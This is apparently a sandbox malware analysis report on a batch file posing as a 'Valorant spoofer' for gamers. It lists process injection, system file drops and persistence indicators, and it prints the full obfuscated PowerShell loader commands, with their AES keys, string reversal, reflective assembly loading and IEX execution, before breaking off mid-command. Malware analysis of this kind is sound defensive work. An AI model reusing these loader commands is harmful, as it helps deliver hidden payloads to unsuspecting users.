ada1cd535f15add50deb5bc5282196d4530b5cd399ccd196ee9069483cba4904

Analysis

max time kernel
59s
max time network
82s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
08-06-2023 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Valorant spoofer.bat
Size

13.4MB
MD5

1a8d2cd894a710d0eafa0675567614e0
SHA1

1ae02eb9bc479fa1293aaa72e6f91f99454a1b46
SHA256

ada1cd535f15add50deb5bc5282196d4530b5cd399ccd196ee9069483cba4904
SHA512

13d30df57e01f7d2281d4b6d5017d1ac63eba2b932637dd4db839050ed7ecff672e46208633f40130bb6a018aa5582dc2046c4b7c0ded4fa637e41aa837dd298
SSDEEP

49152:ku8ZwakWtzSnmpvGaFMfklWzAe0NAkbp1iEE1m4bK8QpVkmrFQZM8BpThDz+y3Hl:3

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

Valorant spoofer.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 2000 created 584	2000	Valorant spoofer.bat.exe	winlogon.exe
PID 3876 created 584	3876	$sxr-powershell.exe	winlogon.exe

Executes dropped EXE 3 IoCs

Processes:

Valorant spoofer.bat.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

2000 Valorant spoofer.bat.exe
3876 $sxr-powershell.exe
4452 $sxr-powershell.exe

Drops file in System32 directory 6 IoCs

Processes:

Valorant spoofer.bat.exe

description	ioc	process
File opened for modification	C:\Windows\System32\ucrtbased.dll	Valorant spoofer.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	Valorant spoofer.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	Valorant spoofer.bat.exe
File created	C:\Windows\System32\ucrtbased.dll	Valorant spoofer.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	Valorant spoofer.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	Valorant spoofer.bat.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Valorant spoofer.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 2000 set thread context of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 3876 set thread context of 960	3876	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 2 IoCs

Processes:

Valorant spoofer.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	Valorant spoofer.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Valorant spoofer.bat.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

Valorant spoofer.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe

pid	process
2000	Valorant spoofer.bat.exe
2000	Valorant spoofer.bat.exe
2000	Valorant spoofer.bat.exe
4128	dllhost.exe
4128	dllhost.exe
4128	dllhost.exe
4128	dllhost.exe
2000	Valorant spoofer.bat.exe
2000	Valorant spoofer.bat.exe
3876	$sxr-powershell.exe
3876	$sxr-powershell.exe
3876	$sxr-powershell.exe
3876	$sxr-powershell.exe
960	dllhost.exe
960	dllhost.exe
960	dllhost.exe
960	dllhost.exe
3876	$sxr-powershell.exe
3876	$sxr-powershell.exe
4452	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

Valorant spoofer.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe

description	pid	process
Token: SeDebugPrivilege	2000	Valorant spoofer.bat.exe
Token: SeDebugPrivilege	2000	Valorant spoofer.bat.exe
Token: SeDebugPrivilege	4128	dllhost.exe
Token: SeDebugPrivilege	3876	$sxr-powershell.exe
Token: SeDebugPrivilege	3876	$sxr-powershell.exe
Token: SeDebugPrivilege	960	dllhost.exe
Token: SeDebugPrivilege	4452	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exeValorant spoofer.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 3688 wrote to memory of 2000	3688	cmd.exe	Valorant spoofer.bat.exe
PID 3688 wrote to memory of 2000	3688	cmd.exe	Valorant spoofer.bat.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 4128	2000	Valorant spoofer.bat.exe	dllhost.exe
PID 2000 wrote to memory of 3876	2000	Valorant spoofer.bat.exe	$sxr-powershell.exe
PID 2000 wrote to memory of 3876	2000	Valorant spoofer.bat.exe	$sxr-powershell.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 960	3876	$sxr-powershell.exe	dllhost.exe
PID 3876 wrote to memory of 4452	3876	$sxr-powershell.exe	$sxr-powershell.exe
PID 3876 wrote to memory of 4452	3876	$sxr-powershell.exe	$sxr-powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:584

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5bb0d73c-5325-4014-974a-fde2cdf52c49}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{930a24e9-c052-4a75-b51a-f970fc1eeb3d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e0113ca6-8676-4f0f-8892-0b87d9a72d5f}
2⤵
PID:2780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Valorant spoofer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3688

C:\Users\Admin\AppData\Local\Temp\Valorant spoofer.bat.exe
"Valorant spoofer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function cZOSZ($DveyJ){ $RyhQd=[System.Security.Cryptography.Aes]::Create(); $RyhQd.Mode=[System.Security.Cryptography.CipherMode]::CBC; $RyhQd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $RyhQd.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('frTWBDOySPvobo86xZKv8qJuCostEiULTQs6B1Q6VAs='); $RyhQd.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('atvGZNQI6HTQ2a32/eF1tQ=='); $Dlmmt=$RyhQd.CreateDecryptor(); $return_var=$Dlmmt.TransformFinalBlock($DveyJ, 0, $DveyJ.Length); $Dlmmt.Dispose(); $RyhQd.Dispose(); $return_var;}function NQwjJ($DveyJ){ $NNKZT=New-Object System.IO.MemoryStream(,$DveyJ); $BUClw=New-Object System.IO.MemoryStream; $QdHKG=New-Object System.IO.Compression.GZipStream($NNKZT, [IO.Compression.CompressionMode]::Decompress); $QdHKG.CopyTo($BUClw); $QdHKG.Dispose(); $NNKZT.Dispose(); $BUClw.Dispose(); $BUClw.ToArray();}function Fbaax($DveyJ,$LauwZ){ $tXjml=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DveyJ); $VYIGK=$tXjml.EntryPoint; $VYIGK.Invoke($null, $LauwZ);}$cDUBn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Valorant spoofer.bat').Split([Environment]::NewLine);foreach ($omiSe in $cDUBn) { if ($omiSe.StartsWith(':: ')) { $XmGPM=$omiSe.Substring(3); break; }}$Ofepp=[string[]]$XmGPM.Split('\');$gQeBK=NQwjJ (cZOSZ ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Ofepp[0])));$QJlLf=NQwjJ (cZOSZ ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Ofepp[1])));Fbaax $QJlLf (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Fbaax $gQeBK (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function WiGae($DxYIu){ $nqCJQ=[System.Security.Cryptography.Aes]::Create(); $nqCJQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nqCJQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nqCJQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lgds4jSFqihfxU9APFdIaMWj1OA7tU0WRgf4DdhR8SA='); $nqCJQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uVepxO/JoyiT9T233gMtvQ=='); $tVHDk=$nqCJQ.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSvej=$tVHDk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DxYIu, 0, $DxYIu.Length); $tVHDk.Dispose(); $nqCJQ.Dispose(); $dSvej;}function HzXJT($DxYIu){ $XeRfC=New-Object System.IO.MemoryStream(,$DxYIu); $dSNSr=New-Object System.IO.MemoryStream; $KDuNl=New-Object System.IO.Compression.GZipStream($XeRfC, [IO.Compression.CompressionMode]::Decompress); $KDuNl.CopyTo($dSNSr); $KDuNl.Dispose(); $XeRfC.Dispose(); $dSNSr.Dispose(); $dSNSr.ToArray();}function bMisQ($DxYIu,$BFdUT){ $RCFAd=[System.Reflection.Assembly]::Load([byte[]]$DxYIu); $Ryexv=$RCFAd.EntryPoint; $Ryexv.Invoke($null, $BFdUT);}$nqCJQ1 = New-Object System.Security.Cryptography.AesManaged;$nqCJQ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nqCJQ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nqCJQ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lgds4jSFqihfxU9APFdIaMWj1OA7tU0WRgf4DdhR8SA=');$nqCJQ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uVepxO/JoyiT9T233gMtvQ==');$oOGwr = $nqCJQ1.('rotpyrceDetaerC'[-1..-15] -join '')();$riXOJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DQ2V/NpTnX4TxvoUAUa8ZQ==');$riXOJ = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ, 0, $riXOJ.Length);$riXOJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ);$JusJr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cKzLHM4KWQ2axBPktUr9ZO18RPWLuEL09NRQ/NCT9Ls=');$JusJr = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JusJr, 0, $JusJr.Length);$JusJr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JusJr);$rkzMI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Z8mob61rdUly9agZuvUWPQ==');$rkzMI = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rkzMI, 0, $rkzMI.Length);$rkzMI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rkzMI);$jvbWA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2gUBFPOXm8pQ3dc+qlo3OmOXW1xGBlvjOTx7W0dFd0QSb/dn7H80MYluVscp3O/7qLloLeUMM+dOkRbYZ5JTzyDuZW+obaSNLHCSMO0OXp4IjA/QLJS1v5XCOOkeQEiHskqupz0S99tNHhTWQC8BRLW4R53CLquojC08AwEc3qWLgXyl2A9eS1JZI8S8MP1OES7dCwxrwmBAysQNoWvx5mGiB6IDbj4IHqtFQeTEvEmIxWqzNj9IxHmNZLITUinsvQL9p8wNi2vijacJTY7LGv/NMfPc00vBNz+VZs8xxMlTzbWLVFxt2U3OSEBXGiLzMOyZLAHCR6XKIESNLwFvauSFVjOfoEfkZZW8/yda8SbS88eiaf/uH5Ul7uqY4derMPqTMJVtzergO9ap0tmMQvQtwtQ012AM3cF5CkPgIU=');$jvbWA = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jvbWA, 0, $jvbWA.Length);$jvbWA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jvbWA);$ykYGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LSut2p7u7GDobqiYSw+7EQ==');$ykYGC = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ykYGC, 0, $ykYGC.Length);$ykYGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ykYGC);$cwdQa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3+tL64xsc/DfTq3+86OLQ==');$cwdQa = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cwdQa, 0, $cwdQa.Length);$cwdQa = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cwdQa);$BrKSz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NMSUJ0Tp8cz3QAXAKmsVWw==');$BrKSz = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BrKSz, 0, $BrKSz.Length);$BrKSz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BrKSz);$UUGuz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZT44Lni/tKLTRw/WhdyxHg==');$UUGuz = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UUGuz, 0, $UUGuz.Length);$UUGuz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UUGuz);$ifoqd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EM5YA04fcwG17D1kMATL3g==');$ifoqd = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ifoqd, 0, $ifoqd.Length);$ifoqd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ifoqd);$riXOJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ivVW/jHEfztB5yK53ntx7A==');$riXOJ0 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ0, 0, $riXOJ0.Length);$riXOJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ0);$riXOJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SZZVahqL2X4dimI7WQZSmA==');$riXOJ1 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ1, 0, $riXOJ1.Length);$riXOJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ1);$riXOJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qeuvdu13rs4eIoPjCB4eHg==');$riXOJ2 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ2, 0, $riXOJ2.Length);$riXOJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ2);$riXOJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3JGaEe23ilQyGJ2PW8WQxQ==');$riXOJ3 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ3, 0, $riXOJ3.Length);$riXOJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ3);$oOGwr.Dispose();$nqCJQ1.Dispose();if (@(get-process -ea silentlycontinue $riXOJ3).count -gt 1) {exit};$jrcCs = [Microsoft.Win32.Registry]::$UUGuz.$BrKSz($riXOJ).$cwdQa($JusJr);$dsSDL=[string[]]$jrcCs.Split('\');$bQffd=HzXJT(WiGae([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dsSDL[1])));bMisQ $bQffd (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Tzvxz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dsSDL[0]);$nqCJQ = New-Object System.Security.Cryptography.AesManaged;$nqCJQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nqCJQ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nqCJQ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lgds4jSFqihfxU9APFdIaMWj1OA7tU0WRgf4DdhR8SA=');$nqCJQ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uVepxO/JoyiT9T233gMtvQ==');$tVHDk = $nqCJQ.('rotpyrceDetaerC'[-1..-15] -join '')();$Tzvxz = $tVHDk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Tzvxz, 0, $Tzvxz.Length);$tVHDk.Dispose();$nqCJQ.Dispose();$XeRfC = New-Object System.IO.MemoryStream(, $Tzvxz);$dSNSr = New-Object System.IO.MemoryStream;$KDuNl = New-Object System.IO.Compression.GZipStream($XeRfC, [IO.Compression.CompressionMode]::$riXOJ1);$KDuNl.$ifoqd($dSNSr);$KDuNl.Dispose();$XeRfC.Dispose();$dSNSr.Dispose();$Tzvxz = $dSNSr.ToArray();$JRcFH = $jvbWA | IEX;$RCFAd = $JRcFH::$riXOJ2($Tzvxz);$Ryexv = $RCFAd.EntryPoint;$Ryexv.$riXOJ0($null, (, [string[]] ($rkzMI)))
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3876

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3876).WaitForExit();[System.Threading.Thread]::Sleep(5000); function WiGae($DxYIu){ $nqCJQ=[System.Security.Cryptography.Aes]::Create(); $nqCJQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nqCJQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nqCJQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lgds4jSFqihfxU9APFdIaMWj1OA7tU0WRgf4DdhR8SA='); $nqCJQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uVepxO/JoyiT9T233gMtvQ=='); $tVHDk=$nqCJQ.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSvej=$tVHDk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DxYIu, 0, $DxYIu.Length); $tVHDk.Dispose(); $nqCJQ.Dispose(); $dSvej;}function HzXJT($DxYIu){ $XeRfC=New-Object System.IO.MemoryStream(,$DxYIu); $dSNSr=New-Object System.IO.MemoryStream; $KDuNl=New-Object System.IO.Compression.GZipStream($XeRfC, [IO.Compression.CompressionMode]::Decompress); $KDuNl.CopyTo($dSNSr); $KDuNl.Dispose(); $XeRfC.Dispose(); $dSNSr.Dispose(); $dSNSr.ToArray();}function bMisQ($DxYIu,$BFdUT){ $RCFAd=[System.Reflection.Assembly]::Load([byte[]]$DxYIu); $Ryexv=$RCFAd.EntryPoint; $Ryexv.Invoke($null, $BFdUT);}$nqCJQ1 = New-Object System.Security.Cryptography.AesManaged;$nqCJQ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nqCJQ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nqCJQ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lgds4jSFqihfxU9APFdIaMWj1OA7tU0WRgf4DdhR8SA=');$nqCJQ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uVepxO/JoyiT9T233gMtvQ==');$oOGwr = $nqCJQ1.('rotpyrceDetaerC'[-1..-15] -join '')();$riXOJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DQ2V/NpTnX4TxvoUAUa8ZQ==');$riXOJ = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ, 0, $riXOJ.Length);$riXOJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ);$JusJr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cKzLHM4KWQ2axBPktUr9ZO18RPWLuEL09NRQ/NCT9Ls=');$JusJr = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JusJr, 0, $JusJr.Length);$JusJr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JusJr);$rkzMI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Z8mob61rdUly9agZuvUWPQ==');$rkzMI = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rkzMI, 0, $rkzMI.Length);$rkzMI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rkzMI);$jvbWA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2gUBFPOXm8pQ3dc+qlo3OmOXW1xGBlvjOTx7W0dFd0QSb/dn7H80MYluVscp3O/7qLloLeUMM+dOkRbYZ5JTzyDuZW+obaSNLHCSMO0OXp4IjA/QLJS1v5XCOOkeQEiHskqupz0S99tNHhTWQC8BRLW4R53CLquojC08AwEc3qWLgXyl2A9eS1JZI8S8MP1OES7dCwxrwmBAysQNoWvx5mGiB6IDbj4IHqtFQeTEvEmIxWqzNj9IxHmNZLITUinsvQL9p8wNi2vijacJTY7LGv/NMfPc00vBNz+VZs8xxMlTzbWLVFxt2U3OSEBXGiLzMOyZLAHCR6XKIESNLwFvauSFVjOfoEfkZZW8/yda8SbS88eiaf/uH5Ul7uqY4derMPqTMJVtzergO9ap0tmMQvQtwtQ012AM3cF5CkPgIU=');$jvbWA = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jvbWA, 0, $jvbWA.Length);$jvbWA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jvbWA);$ykYGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LSut2p7u7GDobqiYSw+7EQ==');$ykYGC = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ykYGC, 0, $ykYGC.Length);$ykYGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ykYGC);$cwdQa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3+tL64xsc/DfTq3+86OLQ==');$cwdQa = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cwdQa, 0, $cwdQa.Length);$cwdQa = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cwdQa);$BrKSz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NMSUJ0Tp8cz3QAXAKmsVWw==');$BrKSz = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BrKSz, 0, $BrKSz.Length);$BrKSz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BrKSz);$UUGuz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZT44Lni/tKLTRw/WhdyxHg==');$UUGuz = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UUGuz, 0, $UUGuz.Length);$UUGuz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UUGuz);$ifoqd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EM5YA04fcwG17D1kMATL3g==');$ifoqd = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ifoqd, 0, $ifoqd.Length);$ifoqd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ifoqd);$riXOJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ivVW/jHEfztB5yK53ntx7A==');$riXOJ0 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ0, 0, $riXOJ0.Length);$riXOJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ0);$riXOJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SZZVahqL2X4dimI7WQZSmA==');$riXOJ1 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ1, 0, $riXOJ1.Length);$riXOJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ1);$riXOJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qeuvdu13rs4eIoPjCB4eHg==');$riXOJ2 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ2, 0, $riXOJ2.Length);$riXOJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ2);$riXOJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3JGaEe23ilQyGJ2PW8WQxQ==');$riXOJ3 = $oOGwr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($riXOJ3, 0, $riXOJ3.Length);$riXOJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($riXOJ3);$oOGwr.Dispose();$nqCJQ1.Dispose();if (@(get-process -ea silentlycontinue $riXOJ3).count -gt 1) {exit};$jrcCs = [Microsoft.Win32.Registry]::$UUGuz.$BrKSz($riXOJ).$cwdQa($JusJr);$dsSDL=[string[]]$jrcCs.Split('\');$bQffd=HzXJT(WiGae([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dsSDL[1])));bMisQ $bQffd (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Tzvxz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dsSDL[0]);$nqCJQ = New-Object System.Security.Cryptography.AesManaged;$nqCJQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nqCJQ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nqCJQ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lgds4jSFqihfxU9APFdIaMWj1OA7tU0WRgf4DdhR8SA=');$nqCJQ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uVepxO/JoyiT9T233gMtvQ==');$tVHDk = $nqCJQ.('rotpyrceDetaerC'[-1..-15] -join '')();$Tzvxz = $tVHDk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Tzvxz, 0, $Tzvxz.Length);$tVHDk.Dispose();$nqCJQ.Dispose();$XeRfC = New-Object System.IO.MemoryStream(, $Tzvxz);$dSNSr = New-Object System.IO.MemoryStream;$KDuNl = New-Object System.IO.Compression.GZipStream($XeRfC, [IO.Compression.CompressionMode]::$riXOJ1);$KDuNl.$ifoqd($dSNSr);$KDuNl.Dispose();$XeRfC.Dispose();$dSNSr.Dispose();$Tzvxz = $dSNSr.ToArray();$JRcFH = $jvbWA | IEX;$RCFAd = 